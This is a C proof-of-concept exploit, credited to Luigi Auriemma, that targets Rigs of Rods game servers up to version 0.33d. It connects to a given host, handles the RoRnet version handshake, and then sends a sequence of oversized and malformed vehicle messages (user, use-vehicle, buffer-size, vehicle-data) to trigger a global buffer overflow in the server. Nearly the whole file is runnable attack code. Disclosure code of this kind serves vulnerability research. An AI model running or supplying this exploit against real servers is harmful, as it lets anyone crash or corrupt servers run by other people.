/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define sleep   Sleep
    #define ONESEC  1000
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>

    #define ONESEC  1
#endif

typedef uint8_t     u8;
typedef uint16_t    u16;
typedef uint32_t    u32;



#define VER         "0.1"
#define PORT        12333
#define BUFFSZ      8192

#define MSG2_HELLO          1000    // client sends its version as first message
#define MSG2_VERSION        1001    // server responds with its version
#define MSG2_FULL           1002    // no more place
#define MSG2_BANNED         1003    // Uh
#define MSG2_WELCOME        1004    // we can proceed
#define MSG2_USE_VEHICLE    1005    // the client says which vehicle it uses
#define MSG2_SPAWN          1006    // the server asks to spawn a new vehicle
#define MSG2_BUFFER_SIZE    1007    // the clients tells the buffer size to use for the selected vehicle
#define MSG2_VEHICLE_DATA   1008    // data block
#define MSG2_USER           1009    // user credentials
#define MSG2_DELETE         1010    // delete a disappearing truck
#define MSG2_CHAT           1011    // chat line
#define MSG2_FORCE          1012    // Force information, attached to a netforce_t struct
#define MSG2_LISTUSERS      1013    // asks for connected users
#define MSG2_LISTUSERS_RESP 1014    // replies with connected users
#define MSG2_PASSWORD       1015    // requests password
#define MSG2_PASSWORD_RESP  1016    // replies password
#define MAX_MESSAGE_LENGTH  8192



int ror_send(int sd, u32 type, u32 source, u8 *in, int insz);
int ror_recv(int sd, u32 *type, u32 *source, u8 *out);
int tcp_recv(int sd, u8 *buff, int size);
u32 resolv(char *host);
void std_err(void);



int main(int argc, char *argv[]) {
    struct  sockaddr_in peer;
    u32     type,
            source;
    int     sd,
            len;
    u16     port    = PORT;
    u8      buff[BUFFSZ + 1],
            ver[256];

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    setbuf(stdout, NULL);

    fputs("\n"
        "Rigs of Rods <= 0.33d global dbuffer buffer-overflow "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 2) {
        printf("\n"
            "Usage: %s <host> [port(%hu)]\n"
            "\n", argv[0], port);
        exit(1);
    }

    if(argc > 2) port = atoi(argv[2]);
    peer.sin_addr.s_addr = resolv(argv[1]);
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;

    printf("- target   %s : %hu\n",
        inet_ntoa(peer.sin_addr), ntohs(peer.sin_port));

    strcpy(ver, "RoRnet_2.0");

redo:
    sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if(sd < 0) std_err();
    if(connect(sd, (struct sockaddr *)&peer, sizeof(struct sockaddr_in))
      < 0) std_err();

    if(ror_send(sd, MSG2_HELLO, 0, ver, strlen(ver)) < 0) goto quit;
    len = ror_recv(sd, &type, NULL, buff);
    if(len < 0) goto quit;

    buff[len] = 0;
    if(strcmp(buff, ver)) {
        close(sd);
        buff[255] = 0;
        strcpy(ver, buff);
        printf("\n- use version %s\n", ver);
        goto redo;
    }

    len = 255;
    memset(buff, 'a', len);
    if(ror_send(sd, MSG2_USER, 0, buff, len) < 0) goto quit;
    len = ror_recv(sd, &type, &source, buff);
    if(len < 0) goto quit;
    if(type != MSG2_WELCOME) goto quit;

    len = MAX_MESSAGE_LENGTH - 1;   // avoid ob1 in server
    memset(buff, 'b', len);
    if(ror_send(sd, MSG2_USE_VEHICLE,  source, buff, len) < 0) goto quit;

    len = 0;    // not important, it's enough to send this packet
    *(u32 *)buff = len;
    if(ror_send(sd, MSG2_BUFFER_SIZE,  source, buff, 4)   < 0) goto quit;

    memset(buff, 'c', len);
    if(ror_send(sd, MSG2_VEHICLE_DATA, source, buff, len) < 0) goto quit;

    sleep(ONESEC);

    close(sd);
    printf("\n- done\n");
    return(0);
quit:
    printf("\nError: problems in sending/receiving data\n");
    return(0);
}



int ror_send(int sd, u32 type, u32 source, u8 *in, int insz) {
    u8      tmp[12];

    *(u32 *)tmp       = type;
    *(u32 *)(tmp + 4) = source;
    *(u32 *)(tmp + 8) = insz;
    if(send(sd, tmp, 12,   0) != 12)   return(-1);
    if(insz) {
        if(send(sd, in,  insz, 0) != insz) return(-1);
    }
    fputc('.', stdout);
    return(0);
}



int ror_recv(int sd, u32 *type, u32 *source, u8 *out) {
    u32     len;
    u8      tmp[12];

    if(tcp_recv(sd, tmp, 12) < 0) return(-1);
    *type = *(u32 *)tmp;
    if(source) *source = *(u32 *)(tmp + 4);
    len   = *(u32 *)(tmp + 8);

    if(len > BUFFSZ) return(-1);
    if(len) {
        if(tcp_recv(sd, out, len) < 0) return(-1);
    }
    fputc('.', stdout);
    return(len);
}



int tcp_recv(int sd, u8 *buff, int size) {
    int     t;
    u8      *p;

    for(p = buff; size; p += t, size -= t) {
        t = recv(sd, p, size, 0);
        if(t <= 0) return(-1);
    }
    return(0);
}



u32 resolv(char *host) {
    struct  hostent *hp;
    u32     host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u32 *)hp->h_addr;
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif


